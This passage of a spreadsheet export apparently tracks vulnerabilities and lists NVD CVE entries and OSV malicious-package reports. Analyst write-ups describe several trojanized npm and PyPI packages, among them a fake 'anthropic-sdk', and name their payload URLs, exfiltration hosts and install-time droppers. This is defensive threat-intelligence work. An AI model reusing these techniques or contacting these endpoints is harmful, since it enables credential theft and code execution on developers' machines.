          <t>In meta, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege, if an attacker has physical access to the device, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11049530 / ALPS11480843; Issue ID: MSV-7935.</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20544</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20579</t>
        </is>
      </c>
      <c r="D118" s="5" t="inlineStr"/>
      <c r="E118" s="5" t="inlineStr"/>
      <c r="F118" s="5" t="inlineStr"/>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>In vdec, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11383899; Issue ID: MSV-9800.</t>
        </is>
      </c>
      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20579</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20586</t>
        </is>
      </c>
      <c r="D119" s="5" t="inlineStr"/>
      <c r="E119" s="5" t="inlineStr"/>
      <c r="F119" s="5" t="inlineStr"/>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr"/>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>In vdec, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS11383899; Issue ID: MSV-9614.</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20586</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20587</t>
        </is>
      </c>
      <c r="D120" s="5" t="inlineStr"/>
      <c r="E120" s="5" t="inlineStr"/>
      <c r="F120" s="5" t="inlineStr"/>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>In mtee, there is a possible escalation of privilege due to type confusion. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11383899; Issue ID: MSV-9608.</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20587</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20588</t>
        </is>
      </c>
      <c r="D121" s="5" t="inlineStr"/>
      <c r="E121" s="5" t="inlineStr"/>
      <c r="F121" s="5" t="inlineStr"/>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="inlineStr"/>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr"/>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>In mtee, there is a possible escalation of privilege due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11383899; Issue ID: MSV-9607.</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20588</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20589</t>
        </is>
      </c>
      <c r="D122" s="5" t="inlineStr"/>
      <c r="E122" s="5" t="inlineStr"/>
      <c r="F122" s="5" t="inlineStr"/>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr"/>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>In venc, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11383899; Issue ID: MSV-9606.</t>
        </is>
      </c>
      <c r="T122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20589</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78371</t>
        </is>
      </c>
      <c r="D123" s="5" t="inlineStr"/>
      <c r="E123" s="5" t="inlineStr"/>
      <c r="F123" s="5" t="inlineStr"/>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr"/>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr"/>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>The File Uploads Addon for WooCommerce WordPress plugin before 1.7.6 does not verify that the person requesting a customer-uploaded file is the customer who uploaded it, allowing unauthenticated attackers who know or guess a file's name to download other customers' uploaded files.</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78371</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84169</t>
        </is>
      </c>
      <c r="D124" s="5" t="inlineStr"/>
      <c r="E124" s="5" t="inlineStr"/>
      <c r="F124" s="5" t="inlineStr"/>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="inlineStr"/>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr"/>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr"/>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>The UPI QR Code Payment Gateway WordPress plugin through 1.4.3 does not verify that a payment-confirmation request actually belongs to the order and customer it claims to confirm, allowing unauthenticated attackers to mark an arbitrary order as paid without making any payment.</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84169</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17343</t>
        </is>
      </c>
      <c r="D125" s="5" t="inlineStr"/>
      <c r="E125" s="5" t="inlineStr"/>
      <c r="F125" s="5" t="inlineStr"/>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="inlineStr"/>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr"/>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/crystalred</t>
        </is>
      </c>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr"/>
      <c r="S125"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
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (db80e6c4fd1d63c2fd93dd289e6a09d2e17d90e1472a6e172b453a213d63ee01)
package.json declares the `libsignal` dependency as `github:Bellaxata/libsignal-node` with no commit SHA, tag, or semver pin. On `npm install`, this resolves to the current HEAD of that GitHub repository and executes whatever lifecycle scripts and code that repo ships at fetch time. Because the source is off-registry and integrity-unchecked, the executed code can change at any moment without a version bump of @bellaxchuu/crystalred, giving the account controlling Bellaxata/libsignal-node arbitrary code execution on any machine installing this package.
</t>
        </is>
      </c>
      <c r="T125" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17343</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17383</t>
        </is>
      </c>
      <c r="D126" s="5" t="inlineStr"/>
      <c r="E126" s="5" t="inlineStr"/>
      <c r="F126" s="5" t="inlineStr"/>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr"/>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr">
        <is>
          <t>npm:@xatancchii/velycxbail</t>
        </is>
      </c>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr"/>
      <c r="S126"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
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (594062e4a945ccd7c67e7a5f03085fbd2eecda766d5347b81e7012399fb1f447)
package.json declares `"libsignal": "npm:@bellaxchuu/libsignal-node@latest"`, aliasing the Signal-protocol crypto dependency to a package published under the unrelated `@bellaxchuu` scope with the mutable `latest` tag and no integrity check. Every `npm install` of @xatancchii/velycxbail resolves libsignal to whatever the current head of `@bellaxchuu/libsignal-node` is at install time. The aliased package is consumed by lib/Utils/crypto.js, which is reached from the main entry through the Utils layer, so arbitrary future content published to that third-party scope loads and executes as part of normal use. The scope does not match the Baileys/WhatsApp publisher chain the fork claims to derive from, so control over the code path executed on installers rests with an unrelated third party.
</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17383</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17404</t>
        </is>
      </c>
      <c r="D127" s="5" t="inlineStr"/>
      <c r="E127" s="5" t="inlineStr"/>
      <c r="F127" s="5" t="inlineStr"/>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr"/>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr">
        <is>
          <t>npm:saturn-baileys</t>
        </is>
      </c>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr"/>
      <c r="S127"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
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (098af0c774d7e3d1a8b2da57e35d5e2686e2149ad6f01fa13803cd1a54325058)
saturn-baileys is a fork of the Baileys WhatsApp library. In lib/Socket/messages-send.js at lines 425 and 436, a network destination is reconstructed at runtime from a String.fromCharCode(...) decimal array rather than appearing as a plain string literal. The decoded value is the URL https://fiora.nixel.my.id/. The obfuscation is placed inside the message-send code path of a messaging library that handles user credentials, session data, and message content, and the destination is not a documented WhatsApp/Baileys endpoint. Reconstructing a hardcoded non-first-party host via char-code decoding inside a send routine is the exfiltration/silent-relay shape for messaging-library trojans and is inconsistent with any legitimate use in this location.
</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17404</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17405</t>
        </is>
      </c>
      <c r="D128" s="5" t="inlineStr"/>
      <c r="E128" s="5" t="inlineStr"/>
      <c r="F128" s="5" t="inlineStr"/>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr">
        <is>
          <t>npm:shadowmd</t>
        </is>
      </c>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr"/>
      <c r="S128"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
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (926dc7dcc164af51175755e81a7a6eabb878244ecc173974ab577a1569ce1ff4)
lib/Socket/messages-send.js at lines 425 and 436 reconstructs the URL https://fiora.nixel.my.id/ from a String.fromCharCode decimal-ASCII array rather than a plain string literal. The host is assembled inside the package's WhatsApp socket message-send code path, so on every message-send flow the runtime resolves to an off-host destination whose identity is hidden from source-level inspection. Obfuscated destination reconstruction in a messaging library's send path is the fingerprint of a Baileys-family fork that intercepts or mirrors session/message data through an author-controlled endpoint; the destination fiora.nixel.my.id is unrelated to the WhatsApp protocol and is not documented as a caller-configurable endpoint.
</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17405</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17472</t>
        </is>
      </c>
      <c r="D129" s="5" t="inlineStr"/>
      <c r="E129" s="5" t="inlineStr"/>
      <c r="F129" s="5" t="inlineStr"/>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr"/>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr">
        <is>
          <t>PyPI:anthropic-sdk</t>
        </is>
      </c>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr"/>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (500869e36b3f76202b63e8db9087adcfc42c8281a27a4402a21285aabde7a511)
The package publishes as `anthropic-sdk` and re-exports the official `anthropic` client's symbols (`from anthropic import *`; re-exports of `Anthropic`/`AsyncAnthropic`), presenting itself as a drop-in for the official SDK. On `import anthropic_sdk`, `__init__.py` imports a `_usage` module that auto-runs a boot routine. That routine increments a run counter persisted to `~/.config/anthropic-sdk/usage.json` and, from the third import onward, fetches `https://cdn.jsdelivr.net/gh/shred0day/payload@main/payload.py` — a third-party user's GitHub repository on a mutable branch, unrelated to Anthropic and with no pin or integrity check — then caches the response base64-encoded to `~/.config/anthropic-sdk/lr.json`, compiles it, `exec()`s it, and calls its `entry()` function. The import-count gate before the first fetch and the base64-at-rest caching of the fetched source serve no legitimate update-check purpose and are consistent with sandbox/analysis evasion. Whoever controls the referenced GitHub repository controls arbitrary code execution on any machine that imports this package.
## Source: kam193 (6844e60d4a58dd11040255e8d632bcca66ae02b1048674e79bddbac1b337f442)
During import, package downloads a remote script, fingerprints the environment looking for sandbox signs, and after a delay exfiltrates sensitive data: credentials, env variables, AI chat files, SSH keys and so on. If exfiltration via HTTPS fails, it attempts DNS-based exfiltration. Additionally, package uses DNS to centrally hold execution.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-10-anthropic-sdk
Reasons (based on the campaign):
 - impersonation
 - Downloads and executes a remote malicious script.
 - The package contains code to detect if it is running in a sandbox environment.
 - obfuscation
 - exfiltration-credentials
 - files-exfiltration
 - exfiltration-env-variables
 - exfiltration-ssh-keys
</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17472</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17473</t>
        </is>
      </c>
      <c r="D130" s="5" t="inlineStr"/>
      <c r="E130" s="5" t="inlineStr"/>
      <c r="F130" s="5" t="inlineStr"/>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="inlineStr"/>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr">
        <is>
          <t>npm:chai-as-testmode</t>
        </is>
      </c>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr"/>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (af5e91a44a2eb0773df19fce2096660c285bafbe846a5f09d8bb25ff0eba22b2)
The package masquerades as the pino logging library (README badges and lib/ contents mimic pino) but ships a dropper at lib/initializeCaller.js. A self-executing IIFE POSTs the full process.env object to a base64-concealed endpoint that decodes to https://ipcheck-hashed.vercel.app/api/auth/b4dadd6a26d820d08596, using an 'x-secret-header: secret' header, and then passes the HTTP response body to new Function('require', response.data) with require handed in — executing attacker-returned JavaScript in the installer's Node process. The transmitted payload is the entire environment (not a single named variable), which on developer and CI machines typically includes NPM_TOKEN, GITHUB_TOKEN, AWS_* credentials, and other CI secrets. The destination URL is stored base64-encoded to conceal it from casual inspection, and the typosquat-style package name together with pino-themed documentation form a cover story for the dropper.
</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17473</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17474</t>
        </is>
      </c>
      <c r="D131" s="5" t="inlineStr"/>
      <c r="E131" s="5" t="inlineStr"/>
      <c r="F131" s="5" t="inlineStr"/>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr"/>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr">
        <is>
          <t>npm:core-js-gnz</t>
        </is>
      </c>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr"/>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (dc57686b95f827f2c3b0501d97b6575e077247255bf5d4227ae9bc8bedd43937)
On install, package.json runs `node init.js` as a postinstall hook. init.js collects host identifiers (os.hostname(), os.userInfo().username, os.platform(), os.arch(), node version, OS release) and POSTs them to https://helper.businesse-vip1.workers.dev/report, then fetches an AES-256-GCM encrypted blob from the /e endpoint on the same host (with TLS verification disabled via rejectUnauthorized:false), decrypts it in-process, writes the decoded content to the user cache directory as exec_runtime.py, and spawns a detached python3 process to execute it (stdio:'ignore', windowsHide, detached:true). Execution is gated on developer-machine heuristics (presence of Desktop/Documents/Downloads in the home directory) and rate-limited via a hidden ~/.cache/core-js-buffer/.init_check marker, with cover-story identifiers ('Environment check', 'TelemetrySender', a BIP-174 seed label). The package name and README advertise an unrelated hex-buffer utility, which does not match the observed behavior.
</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17474</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17475</t>
        </is>
      </c>
      <c r="D132" s="5" t="inlineStr"/>
      <c r="E132" s="5" t="inlineStr"/>
      <c r="F132" s="5" t="inlineStr"/>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="inlineStr"/>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr"/>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr">
        <is>
          <t>npm:css-a11y-contrast-utils</t>
        </is>
      </c>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr"/>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (85ad65ab7d49c4277898f5da5b5d45f3ec9cde46035bcf6416e3a95507ca1301)
